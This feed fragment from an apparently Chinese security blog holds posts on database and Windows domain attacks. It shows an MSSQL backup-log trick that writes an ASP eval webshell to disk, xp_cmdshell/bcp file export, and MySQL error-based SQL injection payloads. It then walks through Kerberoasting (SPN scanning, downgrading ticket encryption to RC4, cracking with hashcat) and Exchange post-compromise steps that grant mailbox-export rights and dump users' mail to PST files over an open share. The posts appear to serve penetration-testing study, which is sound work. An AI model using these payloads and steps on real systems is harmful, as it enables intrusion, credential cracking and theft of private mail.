class="keyword">TO</span> DISK = <span class="string">'D:\backup.bak'</span></div></pre></td></tr></table></figure><h3 id="备份还原-1"><a href="#备份还原-1" class="headerlink" title="备份还原"></a>备份还原</h3><p>ST1 创建数据库。<br>ST2 返回由备份集内包含的数据库和日志文件列表组成的结果集。<br><figure class="highlight sql"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line"><span class="keyword">RESTORE</span> FILELISTONLY</div><div class="line"> <span class="keyword">FROM</span> DISK = <span class="string">' D:\Hs.bak '</span></div></pre></td></tr></table></figure></p><p>ST3 还原并指定数据库物理文件名称及路径。<br><figure class="highlight sql"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div></pre></td><td class="code"><pre><div class="line"><span class="keyword">RESTORE</span> <span class="keyword">DATABASE</span> database_name </div><div class="line"> <span class="keyword">FROM</span> DISK = <span class="string">'D:\Hs.bak'</span></div><div class="line"><span class="keyword">WITH</span> <span class="keyword">REPLACE</span>,</div><div class="line"><span class="keyword">MOVE</span> <span class="string">'HealthSchoolMIS_Data'</span> <span class="keyword">TO</span> <span class="string">'D:\DATA\HealthSchoolMIS_Data.MDF'</span>,</div><div class="line"><span class="keyword">MOVE</span> <span class="string">'HealthSchoolMIS_Log'</span> <span class="keyword">TO</span> <span class="string">'D:\DATA\HealthSchoolMIS_Log.LDF'</span></div></pre></td></tr></table></figure></p><h3 id="数据库备份shell"><a href="#数据库备份shell" class="headerlink" title="数据库备份shell"></a>数据库备份shell</h3><p>第一次进行全量备份<br><figure class="highlight sql"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div></pre></td><td class="code"><pre><div class="line"><span class="keyword">alter</span> <span class="keyword">database</span> database_name <span class="keyword">set</span> <span class="keyword">RECOVERY</span> <span class="keyword">FULL</span> //第一次对数据库进行一次全备份</div><div class="line"><span class="keyword">backup</span> <span class="keyword">database</span> database_name <span class="keyword">to</span> disk = <span class="string">'d:\1.asp'</span></div><div class="line"><span class="keyword">BACKUP</span> <span class="keyword">LOG</span> cannot be performed because there <span class="keyword">is</span> <span class="keyword">no</span> <span class="keyword">current</span> <span class="keyword">database</span> backup.</div></pre></td></tr></table></figure></p><p>建立cmd表,并写入值<br><figure class="highlight sql"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div></pre></td><td class="code"><pre><div class="line"><span class="keyword">create</span> <span class="keyword">table</span> cmd (a image)</div><div class="line"><span class="keyword">insert</span> <span class="keyword">into</span> cmd (a) <span class="keyword">values</span> (<span class="number">0x3C256576616C20726571756573742822732229253E</span>)</div><div class="line"><span class="number">0x3C256576616C20726571756573742822732229253E</span> -> <%eval request(<span class="string">"s"</span>)%></div></pre></td></tr></table></figure></p><p>进行增量备份<br><figure class="highlight sql"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line"><span class="keyword">backup</span> <span class="keyword">log</span> database_name </div><div class="line"><span class="keyword">to</span> disk = <span class="string">'c:\1.asp'</span></div></pre></td></tr></table></figure></p><h3 id="文件上传"><a href="#文件上传" class="headerlink" title="文件上传"></a>文件上传</h3><p>将数据插入本地表<br><figure class="highlight sql"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line"><span class="keyword">create</span> <span class="keyword">table</span> temp (<span class="keyword">data</span> <span class="built_in">text</span>)</div><div class="line"><span class="keyword">bulk</span> <span class="keyword">insert</span> temp <span class="keyword">from</span> <span class="string">'d:\test.txt'</span> <span class="keyword">with</span> (codepage=<span class="string">'RAW'</span>)</div></pre></td></tr></table></figure></p><p>bcp {dbtable | query} {in | out | queryout | format} 数据文件<br>数据库名dbtable -> in/out<br>查询query -> queryout</p><p>远程连接攻击数据库导出为文件<br><figure class="highlight sql"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">EXEC master..xp_cmdshell 'bcp "<span class="keyword">SELECT</span> * <span class="keyword">FROM</span> test.dbo.temp<span class="string">" queryout d:\tset1.txt -c -S"</span>服务器地址<span class="string">" -U"</span>username<span class="string">" -P"</span><span class="keyword">password</span><span class="string">"'</span></div></pre></td></tr></table></figure></p><p>在数据库中<br>导出test数据库中temp表内容到文件(二进制文件也行)<br><figure class="highlight sql"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line">EXEC master..xp_cmdshell 'bcp test.dbo.temp out d:\tset1.txt -c -T' </div><div class="line">EXEC master..xp_cmdshell 'bcp "<span class="keyword">select</span> * <span class="keyword">from</span> test.dbo.temp<span class="string">" queryout "</span>d:\test.exe<span class="string">" -c -T'</span></div></pre></td></tr></table></figure></p><h2 id="Oracle"><a href="#Oracle" class="headerlink" title="Oracle"></a>Oracle</h2>]]></content>
<summary type="html">
<h2 id="MYSQL"><a href="#MYSQL" class="headerlink" title="MYSQL"></a>MYSQL</h2><p>MYSQL各个版本下载<br><a href="http://mirrors.sohu.com/mysql/" target="_blank" rel="external">http://mirrors.sohu.com/mysql/</a></p>
<h3 id="报错注入"><a href="#报错注入" class="headerlink" title="报错注入"></a>报错注入</h3><h4 id="常用报错函数"><a href="#常用报错函数" class="headerlink" title="常用报错函数"></a>常用报错函数</h4><p>FLOOR(X)表示向下取整</p>
<p>select FLOOR(12.2) -&gt; 12</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div></pre></td><td class="code"><pre><div class="line"><span class="keyword">select</span> * <span class="keyword">from</span> t <span class="keyword">where</span> <span class="keyword">name</span>=<span class="string">'a'</span> </div><div class="line"><span class="keyword">UNION</span> ALL <span class="keyword">select</span> <span class="keyword">count</span>(*),<span class="keyword">concat</span>(<span class="keyword">user</span>(),<span class="keyword">floor</span>(<span class="keyword">rand</span>(<span class="number">0</span>)*<span class="number">2</span>))x <span class="keyword">from</span> information_schema.tables <span class="keyword">group</span> <span class="keyword">by</span> x</div><div class="line"></div><div class="line">[Err] <span class="number">1062</span> - <span class="keyword">Duplicate</span> entry <span class="string">'root@localhost1'</span> <span class="keyword">for</span> <span class="keyword">key</span> <span class="string">'group_key'</span></div><div class="line"></div><div class="line"><span class="keyword">select</span> * <span class="keyword">from</span> t <span class="keyword">where</span> <span class="keyword">name</span>=<span class="string">'a'</span> </div><div class="line"><span class="keyword">and</span> (<span class="keyword">select</span> <span class="number">1</span> <span class="keyword">from</span> (<span class="keyword">select</span> <span class="keyword">count</span>(*),<span class="keyword">concat</span>(<span class="keyword">version</span>(),<span class="keyword">floor</span>(<span class="keyword">rand</span>(<span class="number">0</span>)*<span class="number">2</span>))x <span class="keyword">from</span> information_schema.tables <span class="keyword">group</span> <span class="keyword">by</span> x)a);</div></pre></td></tr></table></figure>
<p>XML文档支持</p>
<p>ExtractValue() 长度32位限制</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line"><span class="keyword">select</span> * <span class="keyword">from</span> t <span class="keyword">where</span> <span class="keyword">name</span>=<span class="string">'a'</span> </div><div class="line"><span class="keyword">and</span> (extractvalue(<span class="number">1</span>,<span class="keyword">concat</span>(<span class="number">0x7e</span>,(<span class="keyword">select</span> <span class="keyword">user</span>()),<span class="number">0x7e</span>)));</div></pre></td></tr></table></figure>
<p>[Err] 1105 - XPATH syntax error: ‘~root@localhost~’</p>
<p>UpdateXML()</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line"><span class="keyword">select</span> * <span class="keyword">from</span> t <span class="keyword">where</span> <span class="keyword">name</span>=<span class="string">'a'</span> </div><div class="line"><span class="keyword">and</span> (updatexml(<span class="number">1</span>,<span class="keyword">concat</span>(<span class="number">0x7e</span>,(<span class="keyword">select</span> <span class="keyword">user</span>()),<span class="number">0x7e</span>),<span class="number">1</span>));</div></pre></td></tr></table></figure>
<p>[Err] 1105 - XPATH syntax error: ‘~root@localhost~‘</p>
</summary>
</entry>
<entry>
<title>SPNs</title>
<link href="http://ruos.org/2017/11/01/SPNs/"/>
<id>http://ruos.org/2017/11/01/SPNs/</id>
<published>2017-11-01T06:12:47.000Z</published>
<updated>2017-11-01T06:15:10.914Z</updated>
<content type="html"><![CDATA[<p>首先了解一下Kerberos认证协议</p><p>Kerberos Overview & Communication Process:</p><p><img src="https://www.ibm.com/developerworks/cn/data/library/techarticles/dm-0809govindarajan/image001.gif" alt=""></p><p>KDC(Key Distribution Center)有两个服务组成:身份验证服务(Authentication Server,简称AS)和票据授予服务(Ticket Granting Server,简称TGS)。</p><p>User logs on with username & password.</p><p>客户端认证</p><ol><li>客户端将用户id明文消息发送到AS。</li><li>AS返回使用客户端用户密码加密的会话密钥session key和使用krbegt密码加密的TGT。</li><li>客户端使用用户密码解密消息获得会话密钥,该会话密钥用于与TGS的进一步通信。</li></ol><p>客户服务授权</p><ol><li>客户端发送TGT和用Client/TGS会话密钥加密的认证器。</li><li>TGS解密TGT获得会话密钥并用此密钥解密认证器,如果id匹配则返回使用服务密码加密的客户端到服务器的票据和使用Client/TGS会话密钥加密的客户端/服务器会话密钥session key2。</li></ol><p>客户服务请求</p><ol><li>客户端发送一个用session key2加密的新的Authenticator和服务票据。</li><li>服务器用自己密码解密服务票据并提供服务。</li></ol><h3 id="Service-Principal-Names"><a href="#Service-Principal-Names" class="headerlink" title="Service Principal Names"></a>Service Principal Names</h3><p>服务主体名称 (SPN) 是服务实例的唯一标识符。Kerberos身份验证使用SPN将服务实例与服务登录帐户相关联。以为MSSQL服务配置SPN为例。<br><a href="https://technet.microsoft.com/zh-cn/library/bb735885.aspx" target="_blank" rel="external">https://technet.microsoft.com/zh-cn/library/bb735885.aspx</a></p><a id="more"></a><p>S1. 为 SQL Server 服务帐户注册SPN。</p><p>手动注册<br>setspn -A MSSQLSvc/myhost.redmond.microsoft.com:1433 accountname<br>对于命名实例<br>setspn -A MSSQLSvc/myhost.redmond.microsoft.com/instancename accountname </p><p>查看用户对应的SPN<br><code>setspn -L ruos\sql-service</code></p><p>使用ADSI(adsiedit.msc)查看用户属性</p><p><img src="https://i.imgur.com/bayB8a4.png" alt=""></p><p>S2. 在AD上为用户指定服务登陆权限。</p><p>GPO_name\Computer Configuration\Windows Settings\Security Settings\Local Policies\User Rights Assignment<br>Log on as a service</p><p><img src="https://i.imgur.com/8o7zha7.png" alt=""></p><p>S3. 更改 SQL Server 服务帐户为域用户帐户。</p><h3 id="暴力破解Kerberos-TGS-Tickets"><a href="#暴力破解Kerberos-TGS-Tickets" class="headerlink" title="暴力破解Kerberos TGS Tickets"></a>暴力破解Kerberos TGS Tickets</h3><p>由于加密类型是RC4_HMAC_MD5,Kerberos协议第四步TGS-REP将会返回用服务帐户的NTLM密码哈希加密的票据。</p><p>S1. SPN扫描</p><p><code>setspn -T domain -q */*</code></p><p>或者<br><a href="https://github.com/PyroTek3/PowerShell-AD-Recon/" target="_blank" rel="external">https://github.com/PyroTek3/PowerShell-AD-Recon/</a></p><p><img src="https://i.imgur.com/56AHj7q.png" alt=""></p><p>S2. 请求SPN Kerberos Tickets<br><figure class="highlight powershell"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line">PS C:\> <span class="built_in">Add-Type</span> -AssemblyName System.IdentityModel</div><div class="line">PS C:\> <span class="built_in">New-Object</span> System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList <span class="string">"MSSQLSvc/WEBTST01.ruos.org/SQLEXPRESS"</span></div></pre></td></tr></table></figure></p><p>S3. 查看并导出票据</p><p><img src="https://i.imgur.com/qvvPXcA.png" alt=""></p><blockquote><p>默认配置加密类型是aes256_hmac,tgsrepcrack无法破解,可在服务器组策略指定加密类型为RC4_HMAC_MD5。<br>GPO_name\Computer Configuration\Windows Settings\Security Settings\Local Policies\Security Options<br>Network security: Configure encryption types allowed for Kerberos</p></blockquote><p>S4. 离线破解</p><p>tgsrepcrack(仅对RC4_HMAC_MD5),或者保存hash使用hashcat破解。</p><p><img src="https://i.imgur.com/o8WPRlS.png" alt=""></p><p>S1.导出hash(用于其他加密类型)<br>GetUserSPNs.py -request -outputfile hash.txt -dc-ip 192.168.6.2 ruos.org/user2<br>或者从票据中导出 kirbi2john.py 1-40a00000-user2@MSSQLSvc~WEBTST01.ruos.org~SQLEXPRESS-RUOS.ORG.kirbi<br>S2. hashcat64.exe -m 13100 hash.txt example.dict –force</p><p><a href="https://github.com/nidem/kerberoast" target="_blank" rel="external">https://github.com/nidem/kerberoast</a><br><a href="https://github.com/coresecurity/impacket" target="_blank" rel="external">https://github.com/coresecurity/impacket</a><br><a href="https://github.com/nidem/kerberoast/blob/master/kirbi2john.py" target="_blank" rel="external">https://github.com/nidem/kerberoast/blob/master/kirbi2john.py</a></p><h3 id="其他"><a href="#其他" class="headerlink" title="其他"></a>其他</h3><p><a href="https://msdn.microsoft.com/zh-cn/library/windows/apps/dn194200(v=sql.110).aspx" target="_blank" rel="external">https://msdn.microsoft.com/zh-cn/library/windows/apps/dn194200(v=sql.110).aspx</a></p>]]></content>
<summary type="html">
<p>首先了解一下Kerberos认证协议</p>
<p>Kerberos Overview &amp; Communication Process:</p>
<p><img src="https://www.ibm.com/developerworks/cn/data/library/techarticles/dm-0809govindarajan/image001.gif" alt=""></p>
<p>KDC(Key Distribution Center)有两个服务组成:身份验证服务(Authentication Server,简称AS)和票据授予服务(Ticket Granting Server,简称TGS)。</p>
<p>User logs on with username &amp; password.</p>
<p>客户端认证</p>
<ol>
<li>客户端将用户id明文消息发送到AS。</li>
<li>AS返回使用客户端用户密码加密的会话密钥session key和使用krbegt密码加密的TGT。</li>
<li>客户端使用用户密码解密消息获得会话密钥,该会话密钥用于与TGS的进一步通信。</li>
</ol>
<p>客户服务授权</p>
<ol>
<li>客户端发送TGT和用Client/TGS会话密钥加密的认证器。</li>
<li>TGS解密TGT获得会话密钥并用此密钥解密认证器,如果id匹配则返回使用服务密码加密的客户端到服务器的票据和使用Client/TGS会话密钥加密的客户端/服务器会话密钥session key2。</li>
</ol>
<p>客户服务请求</p>
<ol>
<li>客户端发送一个用session key2加密的新的Authenticator和服务票据。</li>
<li>服务器用自己密码解密服务票据并提供服务。</li>
</ol>
<h3 id="Service-Principal-Names"><a href="#Service-Principal-Names" class="headerlink" title="Service Principal Names"></a>Service Principal Names</h3><p>服务主体名称 (SPN) 是服务实例的唯一标识符。Kerberos身份验证使用SPN将服务实例与服务登录帐户相关联。以为MSSQL服务配置SPN为例。<br><a href="https://technet.microsoft.com/zh-cn/library/bb735885.aspx" target="_blank" rel="external">https://technet.microsoft.com/zh-cn/library/bb735885.aspx</a></p>
</summary>
</entry>
<entry>
<title>域渗透之Exchange Server</title>
<link href="http://ruos.org/2017/07/27/exchange%20server/"/>
<id>http://ruos.org/2017/07/27/exchange server/</id>
<published>2017-07-27T01:56:16.000Z</published>
<updated>2018-05-08T04:22:57.870Z</updated>
<content type="html"><![CDATA[<p><img src="https://i-technet.sec.s-msft.com/Areas/Epx/Themes/TechNet/Content/Images/BrandLogoExchange.png?v=636437933426396895" alt=""></p><blockquote><p>Microsoft Exchange Server 做为消息与协作系统。它提供了业界最强的扩展性、高可靠性、安全性和高处理性能,被许多企业、学校、政府等作为主要邮件系统。在内网渗透测试中,对邮件系统的把控会让你事半功倍,尤其是和AD绑在一起的Exchange。</p></blockquote><p>通过本文你将了解Ps下对Exchange邮件的基本操作,这也同样适用于运维管理,当然相比博大精深的ES是远远不够的。以下环境为Exchange server 2013,也同样适用于2010等版本。</p><p>你可以在开始菜单中通过 Exchange Management Shell (EMS)管理器快捷方式连接到 exchange server,初始化过后你将得到一个Powershell命令窗口。如果连接失败,请相信我,一定是你内存分配的不够,默认安装的Exchange也至少需要分配6个G内存。</p><p>如果一切都没有问题,并且你已经获取了域控权限,那就开始我们的旅程吧!</p><a id="more"></a><h2 id="导出邮箱列表"><a href="#导出邮箱列表" class="headerlink" title="导出邮箱列表"></a>导出邮箱列表</h2><h4 id="查看数据库"><a href="#查看数据库" class="headerlink" title="查看数据库"></a>查看数据库</h4><p>邮箱数据库是创建和存储邮箱的粒度的单位。邮箱数据库以 Exchange 数据库 (.edb) 文件的形式存储。存储结构分为直接附加存储 (DAS)和存储区域网络 (SAN)。我们可以通过 Get-MailboxDatabase cmdlet 从服务器或组织中检索一个或多个邮箱数据库对象。一般为了高可用性至少有两台服务器组成DGA,你可以通过-Server参数指定检索服务器。<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div></pre></td><td class="code"><pre><div class="line">[PS] C:\Windows\system32>get-mailboxdatabase -Server "exchange"</div><div class="line"></div><div class="line">Name Server Recovery ReplicationType</div><div class="line">---- ------ -------- ---------------</div><div class="line">Mailbox Database 0574336487 EXCHANGE False None</div><div class="line">Mailbox Database Test01 EXCHANGE False None</div></pre></td></tr></table></figure></p><p>格式化筛选指定属性,如数据库文件路径<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div></pre></td><td class="code"><pre><div class="line">[PS] C:\>Get-MailboxDatabase -Identity 'Mailbox Database Test01' | Format-List Name,EdbFilePath,LogFolderPath</div><div class="line"></div><div class="line">Name : Mailbox Database Test01</div><div class="line">EdbFilePath : C:\Program Files\Microsoft\Exchange Server\V15\Mailbox\Mailbox Database Test01\Mailbox Database Test01.edb</div><div class="line">LogFolderPath : C:\Program Files\Microsoft\Exchange Server\V15\Mailbox\Mailbox Database Test01</div></pre></td></tr></table></figure></p><p>ECP数据库管理位置</p><p><img src="http://i.imgur.com/JT1pMQf.png" alt=""></p><h4 id="获取组"><a href="#获取组" class="headerlink" title="获取组"></a>获取组</h4><p>在域控中新建过OU(Organizational Unit)之后,我们往往会建立Group来管理用户。查询组的意义在于——往往你会看到有个组名字叫做IT,当然这一步和net group大同小异。通过Get-DistributionGroup cmdlet 查询现有通讯组。<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div></pre></td><td class="code"><pre><div class="line">[PS] C:\Windows\system32>Get-DistributionGroup</div><div class="line"></div><div class="line">Name DisplayName GroupType PrimarySmtpAddress</div><div class="line">---- ----------- --------- ------------------</div><div class="line">EXchange New OU EXchange New OU Universal ENO@ruos.org</div><div class="line">IT Security IT Security Universal, SecurityEnabled it-security@ruos.org</div></pre></td></tr></table></figure></p><p>查看通讯组IT Security详细信息<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div></pre></td><td class="code"><pre><div class="line">[PS] C:\Windows\system32>Get-DistributionGroup "IT Security" | fl</div><div class="line"></div><div class="line"></div><div class="line">RunspaceId : efbb60f9-5ef1-4a8d-9b94-c3f102e576c3</div><div class="line">GroupType : Universal, SecurityEnabled</div><div class="line">SamAccountName : IT Security</div><div class="line">BypassNestedModerationEnabled : False</div><div class="line">ManagedBy : {ruos.org/Users/Administrator, ruos.org/Users/admin}</div><div class="line">MemberJoinRestriction : Closed</div><div class="line">MemberDepartRestriction : Closed</div><div class="line">...</div></pre></td></tr></table></figure></p><p>导出成CSV文件<br><figure class="highlight powershell"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div></pre></td><td class="code"><pre><div class="line"><span class="comment"># 查询通讯组</span></div><div class="line">Get-DistributionGroup | `</div><div class="line"><span class="built_in">Select-Object</span> DisplayName,Name,Alias,GroupType,WindowsEmailAddress,@{n=<span class="string">"ManagedBy"</span>;e={<span class="variable">$_</span>.ManagedBy -Join <span class="string">";"</span>}} ,OrganizationalUnit | `</div><div class="line"><span class="built_in">Export-CSV</span> test.csv -NoType</div></pre></td></tr></table></figure></p><h4 id="获得组成员"><a href="#获得组成员" class="headerlink" title="获得组成员"></a>获得组成员</h4><p>通过Get-DistributionGroupMember cmdlet 可以查找现有的通讯组成员。<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div></pre></td><td class="code"><pre><div class="line">[PS] C:\Windows\system32>Get-DistributionGroupMember -Identity "ENO"</div><div class="line"></div><div class="line">Name RecipientType</div><div class="line">---- -------------</div><div class="line">Administrator UserMailbox</div><div class="line">a UserMailbox</div><div class="line">ming xiao UserMailbox</div><div class="line">user1 UserMailbox</div></pre></td></tr></table></figure></p><h4 id="获得用户admin(可以是域用户格式)邮箱信息"><a href="#获得用户admin(可以是域用户格式)邮箱信息" class="headerlink" title="获得用户admin(可以是域用户格式)邮箱信息"></a>获得用户admin(可以是域用户格式)邮箱信息</h4><p>获取用户邮箱信息。通过以上步骤,我们大概知道了如何查询用户组中的成员,下面我们将使用Get-Mailbox cmdlet 获取邮箱对象和属性。再配合Get-MailboxStatistics cmdlet 获取有关邮箱的信息,例如,邮箱大小、所包含的邮件数、以及最后访问时间。</p><p>基本使用<br>Get-Mailbox | format-tables Name,WindowsEmailAddress<br>Get-Mailbox testuser | fl * | Out-File c:\mb.txt<br>Get-Mailbox | ForEach-Object {$_.Name}</p><p>获取组织单元内用户<br>Get-Mailbox -OrganizationalUnit “New OU”<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div></pre></td><td class="code"><pre><div class="line">[PS] C:\Windows\system32>get-mailboxstatistics -identity admin | Select DisplayName,ItemCount,TotalItemSize,LastLogonTime</div><div class="line"></div><div class="line">DisplayName ItemCount TotalItemSize LastLogonTime</div><div class="line">----------- --------- ------------- -------------</div><div class="line">admin 11 90.88 KB (93,056 bytes) 2016/11/29 19:59:08</div></pre></td></tr></table></figure></p><p>Format-Table 模式查看</p><blockquote><p>使用反引号`换行,输入结束后再回车执行。</p></blockquote><figure class="highlight powershell"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div></pre></td><td class="code"><pre><div class="line"><span class="comment"># 查看所有邮箱信息</span></div><div class="line">Get-Mailbox -ResultSize Unlimited | `</div><div class="line">Get-MailboxStatistics | `</div><div class="line"><span class="built_in">Sort-Object</span> TotalItemSize –Descending | `</div><div class="line">ft DisplayName,@{label=<span class="string">"Mailbox Size (MB)"</span>;expression={<span class="variable">$_</span>.TotalItemSize.Value.ToMB()}</div></pre></td></tr></table></figure><p>导出到CSV文件(这将是你想要的)</p><figure class="highlight powershell"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div></pre></td><td class="code"><pre><div class="line"><span class="variable">$mb</span> = Get-Mailbox -ResultSize Unlimited</div><div class="line"><span class="variable">$output</span> = <span class="keyword">foreach</span>(<span class="variable">$obj</span> <span class="keyword">in</span> <span class="variable">$mb</span> ){</div><div class="line"> <span class="variable">$ms</span> = (Get-MailboxStatistics <span class="variable">$obj</span>.Identity -WarningAction SilentlyContinue )</div><div class="line"><span class="variable">$obj</span> | <span class="built_in">Select-Object</span> DisplayName,Name,WindowsEmailAddress,OrganizationalUnit,Database,`</div><div class="line">@{L=<span class="string">"Mailbox Size (MB)"</span>;E={ <span class="variable">$ms</span>.TotalItemSize.Value.ToMB() }},`</div><div class="line">@{L=<span class="string">"LastLogonTime"</span>;E={ <span class="variable">$ms</span>.LastLogonTime }}</div><div class="line">}</div><div class="line"><span class="variable">$output</span> | <span class="built_in">Export-CSV</span> test.csv -NoType</div></pre></td></tr></table></figure><p>或者通过ECP导出</p><p><img src="http://i.imgur.com/N1mmgDy.jpg" alt=""></p><h2 id="导出PST邮件"><a href="#导出PST邮件" class="headerlink" title="导出PST邮件"></a>导出PST邮件</h2><p>在了解了用户的邮箱使用情况后,我们下一步将邮箱数据导出为PST文件,以方便本地查看和搜索。<br><strong>要在Exchange Server 2010 SP1中使用用户邮箱导出功能,只能使用EMS进行操作。而且操作的Exchange服务器管理员必须要成为“邮箱导入导出角色”。</strong></p><blockquote><p>Exchange Server 2007 可以使用 export-Mailbox cmdlet </p></blockquote><p>导出邮件分为以下几个步骤:</p><ul><li>Step1 为用户添加导出权限</li><li>Step2 导出邮件</li><li>Step3 查看导出请求及删除导出请求</li></ul><h4 id="查看角色(默认只有组织管理成员才有导入-导出权限)"><a href="#查看角色(默认只有组织管理成员才有导入-导出权限)" class="headerlink" title="查看角色(默认只有组织管理成员才有导入/导出权限)"></a>查看角色(默认只有组织管理成员才有导入/导出权限)</h4><p>使用Get-ManagementRole cmdlet 查看组织内已创建的管理角色。<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div></pre></td><td class="code"><pre><div class="line">[PS] C:\Windows\system32>Get-ManagementRole</div><div class="line"></div><div class="line">Name RoleType</div><div class="line">---- --------</div><div class="line">Mailbox Import Export MailboxImportExport</div></pre></td></tr></table></figure></p><p>Get-ManagementRoleAssignment cmdlet 检索管理角色分配。<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div></pre></td><td class="code"><pre><div class="line">[PS] C:\Windows\system32>Get-ManagementRoleAssignment -role "Mailbox Import Export" | Format-List RoleAssigneeName</div><div class="line"></div><div class="line">RoleAssigneeName : Organization Management</div><div class="line"></div><div class="line">RoleAssigneeName : Administrator</div></pre></td></tr></table></figure></p><h4 id="为用户Administrator添加邮箱导入导出角色"><a href="#为用户Administrator添加邮箱导入导出角色" class="headerlink" title="为用户Administrator添加邮箱导入导出角色"></a>为用户Administrator添加邮箱导入导出角色</h4><p>New-ManagementRoleAssignment cmdlet 可以将管理角色分配给管理角色组、管理角色分配策略、用户或通用安全组 (USG)。</p><blockquote><p>添加角色后需要重启EMS</p></blockquote><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div></pre></td><td class="code"><pre><div class="line">[PS] C:\Windows\system32>New-ManagementRoleAssignment -Name "Import Export_Domain Admins" `</div><div class="line">>>-User "Administrator" -Role "Mailbox Import Export"</div><div class="line">>></div><div class="line"></div><div class="line">DataObject : Import Export_Domain Admins</div><div class="line">User : ruos.org/Users/Administrator</div><div class="line">AssignmentMethod : Direct</div><div class="line">Identity : Import Export_Domain Admins</div><div class="line">EffectiveUserName : Administrator</div></pre></td></tr></table></figure><p>删除管理角色分配</p><p><code>Remove-ManagementRoleAssignment "Import Export_Domain Admins" -Confirm:$false</code></p><h4 id="New-MailboxExportRequest-cmdlet-将主邮箱或存档的内容导出到-pst-文件。"><a href="#New-MailboxExportRequest-cmdlet-将主邮箱或存档的内容导出到-pst-文件。" class="headerlink" title="New-MailboxExportRequest cmdlet 将主邮箱或存档的内容导出到 .pst 文件。"></a>New-MailboxExportRequest cmdlet 将主邮箱或存档的内容导出到 .pst 文件。</h4><p>net share 创建“读/写权限”共享文件夹</p><p><code>net share sharename$=c:\share /GRANT:Everyone,FULL</code></p><p>将user1收件箱中的所有邮件导出到 .pst </p><figure class="highlight powershell"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">New-MailboxExportRequest -Mailbox user1 -IncludeFolders <span class="string">"#Inbox#"</span> -FilePath \\<span class="number">10.2</span>.<span class="number">2.163</span>\maildata\user1.pst</div></pre></td></tr></table></figure><blockquote><p>Inbox(收件箱)、SentItems(已发送邮件)、DeletedItems(已删除邮件)、Drafts(草稿)</p></blockquote><p>导出用户 Tony 在 2012 年 1 月 1 日之前收到的邮件正文中包含“公司”和“利润”的邮件。 </p><figure class="highlight powershell"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div></pre></td><td class="code"><pre><div class="line">New-MailboxExportRequest -Mailbox Tony `</div><div class="line">-ContentFilter {(body <span class="nomarkup">-like</span> <span class="string">"*company*"</span>) `</div><div class="line">-and (body <span class="nomarkup">-like</span> <span class="string">"*profit*"</span>) `</div><div class="line">-and (Received <span class="nomarkup">-lt</span> <span class="string">"01/01/2012"</span>)} `</div><div class="line">-FilePath <span class="string">"\\SERVER01\PSTFileShare\Tony_CompanyProfits.pst"</span></div></pre></td></tr></table></figure><p>之后你可以将其载入到Outlook中进行查看。</p><h4 id="查看导出请求状态"><a href="#查看导出请求状态" class="headerlink" title="查看导出请求状态"></a>查看导出请求状态</h4><p>Get-MailboxExportRequest cmdlet 可以查看使用 New-MailboxExportRequest cmdlet 启动的正在执行的导出请求的详细状态。<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div></pre></td><td class="code"><pre><div class="line">[PS] C:\Windows\system32>Get-MailboxExportRequest</div><div class="line"></div><div class="line">Name Mailbox Status</div><div class="line">---- ------- ------</div><div class="line">MailboxExport 